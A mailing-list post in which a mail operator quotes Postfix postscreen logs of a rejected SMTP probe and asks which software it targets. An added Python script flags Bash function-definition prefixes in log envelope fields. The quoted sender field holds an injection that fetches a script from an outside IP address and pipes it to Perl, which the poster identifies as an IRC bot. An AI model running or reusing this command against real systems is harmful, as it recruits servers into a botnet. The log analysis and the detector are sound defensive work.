Within the past several days, I've been monitoring a kind of exploit that
affects the 'from' RCPT part of the SMTP conversation:
```
postfix/postscreen[633104]: PREGREET 8 after 0.09 from [159.89.232.70]:52350:
HELO x\r\n
postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [159.89.232.70]:52350:
550 5.5.1 Protocol error; from=<() { :; }; wget -qO - 193.56.28.202/botF|perl>,
to=<root>, proto=SMTP, helo=<x>
postfix/postscreen[633104]: DATA without valid RCPT from [159.89.232.70]:52350
```
Does anyone know what kind of software is the target of this attack?
Obviously, it's not Postfix, which quickly drops the connection. Could it be
some kind of software that parses logs?
I'd appreciate your thoughts.
PS:
The payload is a Perl IRC bot.
_______________________________________________
mailop mailing list
https://list.mailop.org/listinfo/mailop
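
An added example, not part of the original post: a log scan that flags Postfix reject lines whose envelope fields (`from=`, `to=`, `helo=`) contain the `() {` Bash function-definition prefix seen in the log above. The sample lines are constructed (documentation addresses, placeholder payload), the function and variable names are this example's own, and it also accepts the comma-less `smtpd` reject format, which goes beyond the postscreen lines shown.

```python
import re
from collections import Counter

# Bash function-definition prefix "() {" with optional whitespace,
# as it appears in the from= field of the rejected RCPT in the post.
FUNC_PREFIX = re.compile(r"\(\)\s*\{")

# Reject line from postscreen ("from=<..>, to=<..>,") or smtpd ("from=<..> to=<..>").
REJECT = re.compile(
    r"reject: RCPT from \S*\[(?P<client>[^\]]+)\](?::\d+)?: .*?"
    r"from=<(?P<sender>.*?)>,? to=<(?P<rcpt>.*?)>,? "
    r"proto=\S+ helo=<(?P<helo>.*?)>\s*$"
)

def scan(lines):
    """Return one finding per reject line carrying the prefix in an envelope field."""
    findings = []
    for line in lines:
        m = REJECT.search(line)
        if not m:
            continue  # not a reject line (e.g. PREGREET, DATA without valid RCPT)
        fields = [f for f in ("sender", "rcpt", "helo") if FUNC_PREFIX.search(m[f])]
        if fields:
            findings.append({"client": m["client"], "fields": fields})
    return findings

def clients(findings):
    """Count flagged lines per client address, e.g. to feed a block list review."""
    return Counter(f["client"] for f in findings)

# Constructed sample log lines (unwrapped, one entry per line).
SAMPLE = [
    "postfix/postscreen[1001]: NOQUEUE: reject: RCPT from [192.0.2.10]:52350: "
    "550 5.5.1 Protocol error; from=<() { :; }; echo constructed-sample>, "
    "to=<root>, proto=SMTP, helo=<x>",
    "postfix/postscreen[1001]: DATA without valid RCPT from [192.0.2.10]:52350",
    "postfix/postscreen[1001]: NOQUEUE: reject: RCPT from [192.0.2.44]:40112: "
    "550 5.5.1 Protocol error; from=<alice@example.org>, "
    "to=<bob@example.net>, proto=SMTP, helo=<mail.example.org>",
    "postfix/smtpd[1002]: NOQUEUE: reject: RCPT from unknown[192.0.2.10]: "
    "554 5.7.1 <root>: Relay access denied; from=<a@example.org> "
    "to=<(){ :;}; echo constructed-sample> proto=ESMTP helo=<x>",
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["client"], ",".join(f["fields"]))
```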